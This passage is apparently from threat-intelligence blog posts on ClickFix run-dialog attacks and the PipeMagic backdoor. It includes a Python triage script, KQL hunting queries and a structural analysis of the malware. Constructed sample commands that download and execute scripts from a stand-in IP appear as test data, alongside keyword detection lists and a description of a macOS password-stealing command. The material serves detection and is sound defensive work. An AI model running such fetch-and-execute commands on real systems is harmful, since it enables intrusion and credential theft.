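    # PowerShell expects UTF-16LE; ASCII text then has a NUL in every odd byte.
    nul_ratio = data[1::2].count(0) / max(1, len(data) // 2)
    codec = "utf-16-le" if nul_ratio > 0.5 else "utf-8"
    try:
        text = data.decode(codec)
    except UnicodeDecodeError:
        return None
    return text if all(ch.isprintable() or ch in "\r\n\t" for ch in text) else None


def _has_token(token, text):
    """Match a keyword as a whole token; also works for dash switches such as -useb."""
    return re.search(r"(?<![a-z0-9])%s(?![a-z0-9])" % re.escape(token), text) is not None


def triage(value):
    """Return the normalized command, any decoded payload, and the indicators found."""
    cmd = normalize(value)
    decoded = decode_encoded_command(cmd)
    text = (cmd + "\n" + (decoded or "")).lower()  # scan the decoded payload too
    findings = []
    if "^" in value:
        findings.append("caret_escapes")
    if decoded is not None:
        findings.append("encoded_command")
    findings += ["lolbin:" + b for b in LOLBINS if re.search(r"\b%s(?:\.exe)?\b" % b, text)]
    findings += ["exec:" + k for k in DOWNLOAD_EXEC if _has_token(k, text)]
    for host in URL_RE.findall(text):
        host = host.split("@")[-1].split(":")[0]  # drop userinfo and port
        if IP_HOST_RE.match(host):
            findings.append("ip_host:" + host)
        elif host.rsplit(".", 1)[-1] in SUSPICIOUS_TLDS:
            findings.append("tld:." + host.rsplit(".", 1)[-1])
        if any(host == s or host.endswith("." + s) for s in SHORTENERS):
            findings.append("shortener:" + host)
    if DOUBLE_EXT_RE.search(text):
        findings.append("double_extension")
    elif MEDIA_EXT_RE.search(text) and any(f.startswith("lolbin:") for f in findings):
        findings.append("media_extension_payload")  # a LOLBin fetching ".mp4" is a renamed script
    if SCRIPT_EXT_RE.search(text):
        findings.append("script_extension")
    if any(marker in text for marker in CAPTCHA_MARKERS):
        findings.append("captcha_marker")
    return {"value": value, "normalized": cmd, "decoded": decoded,
            "findings": findings, "score": len(findings)}


# Constructed sample entries: two benign, three modeled on the patterns the blog describes.
ENC_PAYLOAD = "iex (irm http://192.0.2.10/a.txt -UseBasicParsing)"
SAMPLES = [
    "notepad\\1",
    "\\\\fileserver\\share\\1",
    "powershell -w h -c \"iwr http://192.0.2.10/update.mp4 -useb | iex\" "
    "# \u2705 I am not a robot - reCAPTCHA Verification ID: 7421\\1",
    "cmd /c c^u^rl -o %TEMP%\\v.hta.mp4 https://example.icu/v.hta.mp4 ^& ms^hta %TEMP%\\v.hta.mp4\\1",
    "powershell -nop -w hidden -enc "
    + base64.b64encode(ENC_PAYLOAD.encode("utf-16-le")).decode() + "\\1",
]


def triage_all(entries=SAMPLES):
    return [triage(e) for e in entries]


if __name__ == "__main__":
    for r in triage_all():
        print(f"score={r['score']:<2} {r['findings']}\n    {r['normalized'][:100]}")
```

Feed it values exported from a collected hive or the RegistryValueData column of DeviceRegistryEvents. The normalized and decoded text is what to hunt on: plain keyword matching on the raw value would miss both c^u^rl and the content of an -enc payload.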
Beyond Windows: ClickFix targeting macOS users
In June 2025, a ClickFix campaign was reported to be targeting macOS users to deliver Atomic macOS Stealer (AMOS). This new campaign is yet another mark in the continuously evolving threat landscape, as the ClickFix technique was previously observed to be more common in Windows-based attacks.
The campaign, which according to our analysis goes back to late May 2025, redirected target users to ClickFix-themed delivery websites impersonating Spectrum, a US-based company that provides cable television, internet access, and unified communications services:
Figure 30. ClickFix landing page with a fake CAPTCHA
Like any other ClickFix campaign, when the user clicks the Alternate verification button, the page displays instructions the user has to follow to "fix" their issue. Interestingly, the steps the lure displays, even to macOS users, are for Windows devices:
Figure 31. ClickFix instructions presented to the target user
Meanwhile, in the background, a malicious command is copied to the user’s clipboard. The command that is copied is different for macOS and Windows devices.
Windows:
Figure 32. Screenshot of the ClickFix command copied on Windows devices
macOS:
Figure 33. Screenshot of the ClickFix command copied on macOS devices
The command that's copied for macOS devices instructs the system to perform the following actions:
Get the current user: username=$(whoami)
Prompt for the password: repeatedly display a System Password: prompt until the user enters the correct password
Validate the password: use dscl . -authonly to verify the password against macOS directory services
Store the password: save the valid password to the /tmp/.pass file
Remove quarantine: use the stolen password with sudo -S xattr -c to clear the downloaded file's extended attributes, including com.apple.quarantine, so that Gatekeeper doesn't inspect or block it
Make the file executable: chmod +x /tmp/update
Launch the malware: run the downloaded file /tmp/update
The file saved as update within the tmp directory belongs to the AMOS malware family. AMOS variants such as Poseidon and Odyssey are known to steal user information, including browser cookies, passwords, and cryptocurrency wallet credentials.
Behind the click: ClickFix kits and other services for sale
Microsoft Threat Intelligence has observed several threat actors selling the ClickFix builders (also called “Win + R”) on popular hacker forums since late 2024. Some of these actors are bundling ClickFix builders into their existing kits that already generate various files such as LNK, JavaScript, and SVG files. The kits offer creation of landing pages with a variety of available lures including Cloudflare. They also offer construction of malicious commands that users will paste into the Windows Run dialog. These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence. The cost of subscription to such a service might be between US$200 to US$1,500 per month. We’ve also discovered sellers that offer one-time and piece-meal solutions (for example, only the source code, landing page, or the command line) priced anywhere between US$200 and US$500.
Figures 34 and 35 show an example of a ClickFix builder that offers a variety of configurable options such as:
Displaying a decoy PDF file after a target user is phished
Payload execution timing
Virtual machine (VM) detection and evasion (“Anti VM”) and user access control (UAC) bypass
Visual template to be used, such as Google Meet, Google CAPTCHA, or Cloudflare
Language to be used, for example, English, German, Spanish, French, Italian, or Portuguese
Figure 34. Screenshot of a ClickFix builder, taken from the seller's demo video
Figure 35. Another screenshot of a ClickFix builder, taken from the seller's demo video
ClickFix protection and detection
Microsoft Defender XDR offers comprehensive coverage for ClickFix attacks by leveraging a range of available technologies across different attack layers. For example, Microsoft Defender SmartScreen displays a warning to Microsoft Edge users when they visit a ClickFix landing page:
Figure 36. Microsoft Defender SmartScreen flagging a ClickFix landing page
Even if a user chooses to bypass the SmartScreen warning or is using a different web browser and is socially engineered into executing a command in the Run dialog, Microsoft Defender for Endpoint detects and mitigates the attack's initial access activities, like the suspicious process execution and command-line activity, during the process scan phase.
Most attack paths eventually lead to the execution of either PowerShell or HTA scripts. Microsoft’s Antimalware Scan Interface (AMSI) provides scanning capabilities for both scripting environments and PowerShell applications. Defender’s Cloud Protection delivers enhanced protection by monitoring and intercepting outgoing connections to malicious URLs as well as analyzing process execution patterns. Additionally, Microsoft Defender for Office 365 analyzes end-to-end links and HTML attachments, and has fake CAPTCHA behavioral signatures that proactively block ClickFix-related phishing emails.
Additional attack chain coverage with network protection
In early 2025, Microsoft Defender Experts observed thousands of devices being affected by a ClickFix attack (that is, the ClickFix command was executed by a user on the device) per month, even with an endpoint detection and response (EDR) solution enabled. Due to this, our researchers performed pattern-of-life analysis to follow the tactics, techniques, and procedures (TTPs) in the attack timeline and understand the gaps that could be filled so that the attack could be stopped at the initial access stage. Their research resulted in the automated analysis and collection of numerous obfuscated/encoded LOLBin commands observed in the RunMRU registry key, and they were able to extract and block newly created malicious domains through Defender for Endpoint's network protection feature. This feature is an important component of protection against ClickFix because blocking the C2 domains early in the attack chain prevents the download and/or execution of first-stage payloads, effectively making the attack unsuccessful.
Recommendations
Microsoft Threat Intelligence recommends the following mitigations to reduce the impact of this threat.
Educate users to identify social engineering attacks.
Ensure users are aware of what they copy and paste.
Check your Microsoft 365 email filtering settings to ensure spoofed emails, spam, and emails with malware are blocked. Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Defender for Office 365 to recheck links on click and delete sent mail in response to newly acquired threat intelligence. Turn on safe attachments policies to check attachments to inbound email.
Block web pages from automatically running Flash plugins.
Enable network protection and web protection in Microsoft Defender for Endpoint to safeguard against malicious sites and internet-based threats.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Enable PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) to detect and analyze obfuscated or encoded commands. Script blocks are recorded as they are executed, so encoded or concatenated commands appear in their decoded form, providing visibility into malicious script execution that might otherwise evade traditional logging.
Use PowerShell execution policies such as AllSigned or RemoteSigned to help reduce the risk of malicious execution by ensuring only trusted, signed scripts are executed, adding a layer of control. Note that the execution policy is not a security boundary: it governs script files, not commands typed or pasted into the console, and it can be overridden per process (for example, with -ExecutionPolicy Bypass), so treat it as a hygiene control rather than a defense against ClickFix commands.
Use Group Policy to deploy hardening configurations throughout your environment, if certain features are not necessary:
Disable the Run dialog box (Win + R) and remove the Run option from the Start menu by selecting User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu. (This policy sets the NoRun value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.)
Create an App Control policy that prohibits the launch of native Windows binaries from Run. Because commands entered in the Run dialog are started by explorer.exe, this can be accomplished by defining a rule keyed on the launching process for binaries like PowerShell.
Microsoft Defender XDR customers can also implement the following attack surface reduction rules to harden an environment against PowerShell techniques used by threat actors:
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
The following Microsoft Defender for Endpoint alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:
Suspicious command in RunMRU registry
Use of living-off-the-land binary to run malicious code
Suspicious process executed PowerShell command
Suspicious PowerShell command line
Suspicious ‘SuspClickFix’ behavior was blocked
An active ‘SuspDown’ malware was prevented from executing via AMSI
Suspicious ‘MaleficAms’ behavior was blocked
An active ‘ClickFix’ malware in a command line was prevented from executing
‘ClickFix’ malware was prevented
Information stealing malware activity
Powershell made a suspicious network connection
Suspicious process launch by Rundll32.exe
Suspicious Rundll32 command-line
Suspicious Scheduled Task Process Launched
Microsoft Defender for Office 365
Microsoft Defender for Office 365 detects malicious activity associated with this threat through the following alerts:
A potentially malicious URL click was detected
Email messages containing malicious URL removed after delivery
Email messages removed after delivery
A user clicked through to a potentially malicious URL
Suspicious email sending patterns detected
Email reported by user as malware or phish
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
Check impact of an external threat article
Suspicious script analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following queries to find related activity in their networks:
ClickFix command execution
Identifies ClickFix command execution via entries written to the Explorer RunMRU key.
DeviceRegistryEvents
| where ActionType =~ "RegistryValueSet"
| where InitiatingProcessFileName =~ "explorer.exe"
| where RegistryKey has @"\CurrentVersion\Explorer\RunMRU"
| where RegistryValueData has "✅"
or (RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")
and RegistryValueData matches regex "[\u0400-\u04FF\u0370-\u03FF\u0590-\u05FF\u0600-\u06FF\u0E00-\u0E7F\u2C80-\u2CFF\u13A0-\u13FF\u0530-\u058F\u10A0-\u10FF\u0900-\u097F]")
or (RegistryValueData has "mshta" and RegistryValueName !~ "MRUList" and RegistryValueData !in~ ("mshta.exe\\1", "mshta\\1"))
or (RegistryValueData has_any ("bitsadmin", "forfiles", "ProxyCommand=") and RegistryValueName !~ "MRUList")
or ((RegistryValueData startswith "cmd" or RegistryValueData startswith "powershell")
and (RegistryValueData has_any ("-W Hidden ", " -eC ", "curl", "E:jscript", "ssh", "Invoke-Expression", "UtcNow", "Floor", "DownloadString", "DownloadFile", "FromBase64String", "System.IO.Compression", "System.IO.MemoryStream", "iex", "Invoke-WebRequest", "iwr", "Get-ADDomainController", "InstallProduct", "-w h", "-X POST", "Invoke-RestMethod", "-NoP -W", ".InVOKe", "-useb", "irm ", "^", "[char]", "[scriptblock]", "-UserAgent", "UseBasicParsing", ".Content")
or RegistryValueData matches regex @"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\s[A-Za-z0-9+/=]{15,}"))
Lampion malware activity
The following query searches for the PowerShell command associated with Lampion malware activity that is used to download malicious files.
DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessParentFileName == "explorer.exe"
| where FileName has_any ("WScript.exe")
| where ProcessCommandLine contains "\"PowerShell.exe\" -windowstyle minimized -Command"
and ProcessCommandLine has "Invoke-WebRequest"
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
To know how Microsoft can help your team stop similar threats and prevent future compromise with human-led managed services, check out Microsoft Defender Experts for XDR.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Among the many advanced attacker tools that show how threat actors continuously evolve their tactics, techniques, and procedures (TTPs) to evade detection and maximize impact, PipeMagic stands out as particularly advanced. It is a highly modular backdoor used by Storm-2460 that masquerades as a legitimate open-source ChatGPT Desktop Application.
Beneath its disguise, PipeMagic is a sophisticated malware framework designed for flexibility and persistence. Once deployed, it can dynamically execute payloads while maintaining robust command-and-control (C2) communication via a dedicated networking module. As the malware receives and loads payload modules from C2, it grants the threat actor granular control over code execution on the compromised host. By offloading network communication and backdoor tasks to discrete modules, PipeMagic maintains a modular, stealthy, and highly extensible architecture, making detection and analysis significantly challenging.
Microsoft Threat Intelligence encountered PipeMagic as part of research on an attack chain involving the exploitation of CVE-2025-29824, an elevation of privilege vulnerability in Windows Common Log File System (CLFS). We attributed PipeMagic to the financially motivated threat actor Storm-2460, who leveraged the backdoor in targeted attacks to exploit this zero-day vulnerability and deploy ransomware. The observed targets of Storm-2460 span multiple sectors and geographies, including the information technology (IT), financial, and real estate sectors in the United States, Europe, South America, and the Middle East. While the impacted organizations remain limited, the use of a zero-day exploit, paired with a sophisticated modular backdoor for ransomware deployment, makes this threat particularly notable.
This blog provides a comprehensive technical deep dive that adds to public reporting, including by ESET Research and Kaspersky. Our analysis reveals the wide-ranging scope of PipeMagic’s internal architecture, modular payload delivery and execution mechanisms, and encrypted inter-process communication via named pipes.
The blog aims to equip defenders and incident responders with the knowledge needed to detect, analyze, and respond to this threat with confidence. As malware continues to evolve and become more sophisticated, we believe that understanding threats such as PipeMagic is essential for building resilient defenses for any organization. By exposing the inner workings of this malware, we also aim to disrupt adversary tooling and increase the operational cost for the threat actor, making it more difficult and expensive for them to sustain their campaigns.
PipeMagic: Technical analysis
PipeMagic has been used by Storm-2460 in multiple instances as part of pre-exploitation activity for attack chains involving CVE-2025-29824. Microsoft Threat Intelligence observed Storm-2460 using the certutil utility to download a file from a legitimate website that was previously compromised to host the threat actor’s malware. The downloaded payload is a malicious MSBuild file that ultimately drops and executes PipeMagic in memory. Once PipeMagic is running, the threat actor performs the CLFS exploit to escalate privileges before launching their ransomware.
The first stage of the PipeMagic infection execution begins with a malicious in-memory dropper disguised as the open-source ChatGPT Desktop Application project. The threat actor uses a modified version of the GitHub project that includes malicious code to decrypt and launch an embedded payload in memory.
The embedded payload is the PipeMagic malware, a modular backdoor that communicates with its C2 server over TCP. Once active, PipeMagic receives payload modules through a named pipe and from its C2 server. The malware self-updates by storing these modules in memory using a series of doubly linked lists. These lists serve distinct purposes for staging, execution, and communication, enabling the threat actor to interact with and manage the backdoor’s capabilities throughout its lifecycle.
Internal linked list structures
In our analysis, we identified the use of four distinct doubly linked list structures, each serving a unique function within the backdoor’s architecture:
Payload linked list: Stores raw payload modules in each node, representing the initial stage of modular deployment.
Execute linked list: Contains payload modules that have been successfully loaded into memory and are ready for execution.
Network linked list: Contains networking modules responsible for C2 communication.
Unknown linked list: This structure lacks an immediately observable function. Based on behavioral analysis, we hypothesize it is leveraged dynamically by loaded payloads rather than the core backdoor logic itself.
In the next sections, we will detail how each of these linked lists is populated and utilized as we walk through the malware’s execution flow and capabilities.
Populating the payload linked list
The malware uses a doubly linked list structure to manage its payload modules, with each node encapsulating a payload in its raw Windows Portable Executable (PE) format. Before initializing this list, the malware generates a 16-byte random bot identifier unique to the infected host.
Figure 1. Bot ID generation
It then spawns a dedicated thread to establish a named pipe for payload delivery. The pipe is created using the format ‘\\.\pipe\1.<Bot ID hex string>’, where the bot ID is the randomly generated ID above.
Figure 2. Pipe name generation
A bidirectional named pipe is established, enabling both read and write operations between the malware (acting as the pipe client) and the payload delivery mechanism (pipe server). The malware continuously listens on this pipe, reading incoming payload modules in a loop. For each module, the malware reads the payload’s length from the pipe, allocates memory accordingly, reads the payload content, and adds it to the payload module linked list.
Figure 3. Connecting and reading pipe data
The structure below represents the layout of the pipe data being delivered to the malware from the pipe server.
struct pipe_data_struct
{
DWORD module_setup_flag; // add module node (1) or stop reading pipe (2)
DWORD module_index; // module index
DWORD module_name; // module name
DWORD module_body_len; // length of module data
DWORD module_body_SHA1_hash; // SHA1 hash of module data
BYTE module_body[]; // pointer to module data
};
After the pipe data is read, the malware extracts the module body and decrypts it using RC4 with the following hardcoded 32-byte key:
The malware then computes the SHA-1 hash of the decrypted data and compares it against the hash provided in the pipe data to verify integrity.
Figure 4. Decrypting module data and performing hash validation
Upon successful validation, the malware constructs the following node structure representing the payload module and inserts it at the head of the payload linked list. This same structure is also used later in the execute linked list.
struct __declspec(align(8)) module_node
{
module_node *next; // next node
module_node *prev; // previous node
DWORD module_index; // module index
DWORD exec_ll_module_index; // module index in the execute linked list
BYTE *module_data_ptr; // module pointer
DWORD module_data_len; // module length
DWORD module_name; // module name
int module_entry; // module entrypoint
int module_attribute; // attribute (4: aPLib compressed, 8: RC4 encrypted, 12: both)
BYTE module_initialized_flag; // initialized flag
BYTE *module_hash_ptr; // module SHA1 hash
DWORD module_hash_len; // module SHA1 hash length
};
Figure 5. Populating payload module with pipe data
The malware communicates the result of this operation back to the pipe server using the following response codes:
Code | Description
0x0 | Success – module node created and inserted
0x1 | Invalid pipe data size
0x3 | Failed to create a payload module node
0xA | SHA-1 hashing of module data failed
0xB | Hash mismatch – integrity check failed
This thread remains active throughout the backdoor’s lifecycle, allowing the threat actor to continuously deliver new payloads through the named pipe. The thread only terminates when the malware receives a module setup flag value of 2 in the pipe data, signaling the end of payload delivery.
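To make the pipe-delivery flow concrete, here is an added Python model of the reader thread (example code, not PipeMagic’s or Microsoft’s): it RC4-decrypts each module body, checks the SHA-1 over the decrypted data, inserts a node at the head of a doubly linked payload list and returns the response codes listed above. The wire layout (little-endian DWORDs followed by a raw 20-byte SHA-1 and the body), the RC4 key and the sample records are assumptions, since the page does not reproduce them.

```python
"""Model of PipeMagic's pipe-reader thread (added example, not the malware's or
Microsoft's code): RC4-decrypt, verify SHA-1, insert at head of payload list."""
import hashlib
import struct
from dataclasses import dataclass
from typing import Iterator, List, Optional

# Assumption: the page does not reproduce the real hardcoded RC4 key,
# so a constructed 32-byte placeholder is used here.
RC4_KEY = bytes(range(0x20, 0x40))
# Response codes from the page (0x3 and 0xA are allocation/hashing failures
# that this model has no way to hit, so they are not returned here).
RESP_SUCCESS, RESP_INVALID_SIZE, RESP_HASH_MISMATCH = 0x0, 0x1, 0xB
FLAG_ADD_MODULE, FLAG_STOP = 1, 2  # module_setup_flag values
# Assumed wire layout: four little-endian DWORDs (setup flag, module index,
# module name, body length), then a raw 20-byte SHA-1, then the RC4 body.
HEADER = struct.Struct("<IIII")
SHA1_LEN = 20

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same op."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

@dataclass
class ModuleNode:
    # Subset of the module_node structure shown on the page
    module_index: int
    module_name: int
    module_data: bytes
    module_hash: bytes
    prev: Optional["ModuleNode"] = None
    next: Optional["ModuleNode"] = None

class PayloadList:
    """Doubly linked list; new nodes are inserted at the head."""
    def __init__(self) -> None:
        self.head: Optional[ModuleNode] = None

    def insert_head(self, node: ModuleNode) -> None:
        node.next, node.prev = self.head, None
        if self.head is not None:
            self.head.prev = node
        self.head = node

    def __iter__(self) -> Iterator[ModuleNode]:
        node = self.head
        while node is not None:
            yield node
            node = node.next

def build_record(flag: int, index: int, name: int, plaintext: bytes,
                 key: bytes = RC4_KEY) -> bytes:
    """Constructed helper that encodes one record as a pipe server would."""
    if flag == FLAG_STOP:
        return HEADER.pack(flag, index, name, 0)
    return (HEADER.pack(flag, index, name, len(plaintext))
            + hashlib.sha1(plaintext).digest() + rc4(key, plaintext))

def process_record(buf: bytes, offset: int, payload_list: PayloadList,
                   key: bytes = RC4_KEY):
    """Handle the record at buf[offset:]. Returns (response code or None,
    next offset, stop), where stop ends the read loop."""
    if len(buf) - offset < HEADER.size:
        return RESP_INVALID_SIZE, len(buf), True
    flag, index, name, body_len = HEADER.unpack_from(buf, offset)
    if flag == FLAG_STOP:  # end of payload delivery, no node created
        return None, offset + HEADER.size, True
    start = offset + HEADER.size
    end = start + SHA1_LEN + body_len
    if end > len(buf):
        return RESP_INVALID_SIZE, len(buf), True
    expected = buf[start:start + SHA1_LEN]
    plaintext = rc4(key, buf[start + SHA1_LEN:end])
    if hashlib.sha1(plaintext).digest() != expected:
        return RESP_HASH_MISMATCH, end, False  # integrity check failed
    payload_list.insert_head(ModuleNode(index, name, plaintext, expected))
    return RESP_SUCCESS, end, False

def read_pipe_stream(buf: bytes, payload_list: PayloadList,
                     key: bytes = RC4_KEY) -> List[int]:
    """Loop over records as the reader thread does until a stop flag."""
    codes, offset, stop = [], 0, False
    while not stop:
        code, offset, stop = process_record(buf, offset, payload_list, key)
        if code is not None:
            codes.append(code)
    return codes
```

Feeding it a tampered record shows why the SHA-1 check matters: the node is never created, so a corrupted or substituted module cannot reach the execute linked list.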
Malware configuration
The malware uses a well-defined configuration structure to manage its operational parameters.
The outermost configuration is represented by the following structure. It consists of a length field followed by a data buffer of that length:
If the config_len field is the constant 0x5A, the hardcoded configuration is deemed invalid, and the malware simply operates in local execution mode, communicating exclusively with the loopback interface at 127.0.0[.]1:8082. This mode is likely used for testing or staging purposes, allowing the malware to simulate C2 interactions without external network dependencies.
The config_data field itself contains multiple configuration blocks. Each block follows a consistent internal format:
The malware uses the block_index field to identify and retrieve specific configuration blocks as needed. Below is a breakdown of the known block indices and their corresponding data:
Block index | Block description | Block data
1 | C2 config block | aaaaabbbbbbb.eastus.cloudapp.azure[.]com:443
2 | Unknown | 43
3 | Backdoor’s max up time | 172800
4 | Unknown | 120
It’s currently unclear how blocks with indices 2 and 4 are used. These values do not appear to influence the malware’s core functionality. However, they are transmitted to the C2 server alongside system information during the initial connection.
The data in block index 1 is itself another configuration block. It contains the actual C2 address used by the malware, which is aaaaabbbbbbb.eastus[.]cloudapp.azure[.]com:443. This domain has been disabled by Microsoft.
Figure 6. Extracting configuration
Launching networking module
The backdoor does not communicate with C2 directly. Instead, it delegates this task to a network module in the network linked list.
First, it populates the network linked list with module nodes. Each node contains an executable module responsible for handling C2 communication.
In the sample analyzed, the network module data is embedded within the backdoor binary. This data is first XOR-decrypted using the following hardcoded 32-byte key, then decompressed using the aPLib compression algorithm.
00000000 91 df 5d 0e 9c 64 cd bd c2 46 f2 4b 6b ce 4a dc |.ß]..dͽÂFòKkÎJÜ|
00000010 aa 38 f9 60 0f e4 e4 98 ed 05 46 f1 ca d9 54 c5 |ª8ù`.ää.í.FñÊÙTÅ|
Figure 7. Decrypting network module data
Using the decrypted module data, the malware populates the following structure representing a module node in the network linked list.
struct network_module_node
{
__int64 module_index; // module index in network linked list
BYTE *module_base; // pointer to module base
__int64 module_size; // module size
__int64 module_main_func; // pointer to the main function
BYTE *module_entrypoint; // pointer to the module's entry point
BYTE terminate_flag; // terminate flag
};
Once the node is initialized and the module is loaded into memory, the malware executes the module’s entry point, passing a pointer to its own main function as a parameter.
Figure 8. Launching network module’s entry point
In the network module’s entry point, the module sets its third argument to point to its actual main function. The backdoor stores that pointer in the module_main_func field of the node structure, so it can call the module’s main function directly.
Figure 9. Network module’s entry point
Finally, the backdoor inserts the module node into the network linked list and invokes its main function, passing the C2 address extracted from the configuration.
Figure 10. Launching network module’s main function
Network module: Establishing C2 connection
When launched by the backdoor, the network module first exports and registers three of its internal functions for use by the backdoor:
A function to send data to the C2 server over TCP
A function that returns the constant value 0x8ca
A function to set a stop signal, instructing both the backdoor and the network module to terminate all C2 communications
The backdoor uses the first exported function to send data to the C2 server through the network module, rather than handling communication directly.
Figure 11. Network module’s exported functions
After initialization, the network module begins its communication routine with the C2 server. On each execution, it limits itself to a maximum of five communication attempts with the C2.
Once a TCP connection is established, the module sends the following HTTP GET request to initiate communication with the C2 server. The path includes a randomly generated 16-character hexadecimal string that is unique for each connection.
Figure 12. Setting up and sending initial GET request
Once a valid response is received from the C2 server, the network module transfers execution back to the backdoor. At this point, the backdoor collects system information and sends it to the C2 server using the network module’s communication function (annotated as C2_send_request in Figure 11).
System information collection
After the C2 connection is successfully established by the network module, the backdoor collects a comprehensive set of system and internal state information to send back to the C2 server:
Generated bot ID
Network module’s index in the network linked list
Operating system version
Computer name
Malware executable name
Malware process ID
Whether the host belongs to the Network Configuration Operators SID group
Domain NetBIOS name
Whether the malware is running as a 64-bit process
List of all LAN domain groups the host belongs to
Integrity level of the malware process
User domain name
Session ID of the malware process
Host’s IP address
Malware’s current working directory
Data from all nodes in the execute linked list
Data from all nodes in the unknown linked list
This host information is commonly collected by backdoors to be used as the host’s unique identifier when the malware attempts to establish a connection with its C2 server. Once this information is gathered, the PipeMagic backdoor invokes the network module’s communication function to transmit the data to the C2 server over the established TCP socket.
After the data is sent, execution is handed back to the network module, which waits for and receives the C2 response.
Finally, the network module transfers control back to the backdoor, passing along the C2 response so the backdoor can proceed with executing its core malicious capabilities.
Processing C2 response
Once the backdoor receives a response from the C2 server, it parses the data to extract the outer processing command. This command determines how the backdoor should handle the response and what actions to take next.
Below is a list of known processing codes and their corresponding functionalities:
Processing code | Processing data | Functionality
0x1 | Backdoor code and data | Executes core backdoor functionality using modules from the execute and payload linked lists
0x3 | Module index | Looks up a module node with the provided index and executes the module code
0x5 | A message | Sends the received message back to the C2 server as an acknowledgment or echo
0x7 | N/A | Shuts down the network module and stops all C2 communication
0x8 | Backdoor code and data | Executes backdoor functionality using modules from the unknown linked list
0xA | Module node argument | Invokes all modules in the execute linked list with the specified argument
Backdoor capabilities: Execute and payload linked list
Among all the outer processing commands, processing code 0x1 is the most significant. When this code is received, the associated processing data contains inner backdoor commands and arguments that enable PipeMagic to perform a wide range of backdoor operations.
Below is a list of known backdoor codes and their corresponding functionalities:
Backdoor code | Backdoor arguments | Functionality
0x1 | N/A | Retrieves metadata from all module nodes in the payload linked list
0x2 | arg1: Module index; arg2: Module data length; arg3: Module name; arg4: Module attribute; arg5: Module SHA1 hash | Inserts a new module node into the payload linked list and initializes it with the provided data; skips insertion if a matching module (by index and hash) already exists
0x3 | arg1: Module index; arg2: Hash flag; arg3: Write offset; arg4: Write length; arg5: Payload data | Locates a module node in the payload linked list using the provided index and writes data at the specified offset; if the hash flag is provided, recomputes and updates the SHA-1 hash after RC4 encryption and aPLib compression (depending on the module’s attribute)
0x4 | arg1: Module index; arg2: Read offset; arg3: Read length | Reads a segment of data from a module node in the payload linked list
0x5 | arg1: Module index | Deletes a module node from the payload linked list
0x6 | arg1: Module index; arg2: Write offset; arg3: Payload data; arg4: Write length | Writes data to a module node without updating the SHA-1 hash
0x7 | arg1: Module index | Retrieves the SHA-1 hash of a module node in the payload linked list
0x9 | N/A | Retrieves data from all module nodes in the execute linked list
0xA | arg1: Module index | Retrieves data from a specific module node in the execute linked list
0xB | arg1: Payload module index; arg2: Execute module index; arg3: Initialization flag | Loads a payload module into memory and binds it to a node in the execute linked list, then invokes its entry point
0xC | arg1: Module index | Executes the entry point of a module node in the execute linked list
0xD | N/A | Retrieves the user’s domain name
0xE | N/A | Retrieves the current C2 processing code and data
0xF | N/A | Renames the malware executable to “:fuckit” and marks it for self-deletion
0x10 | arg1: Lower index; arg2: Upper index | Deletes all module nodes in the payload linked list within the specified index range
0x11 | arg1: Module name | Deletes a module node in the payload linked list by name instead of index
0x13 | N/A | Enumerates all running processes and collects session ID, PID, PPID, creation time, executable path, user domain, and architecture (32-bit or 64-bit)
0x14 | arg1: Module index; arg2: New module name; arg3: Module hash length; arg4: Module hash; arg5: Pipe data to send; arg6: Pipe name; arg7: Max elapsed time | Replaces a module node in the payload linked list; sends data to a named pipe and parses the response to receive the payload module data
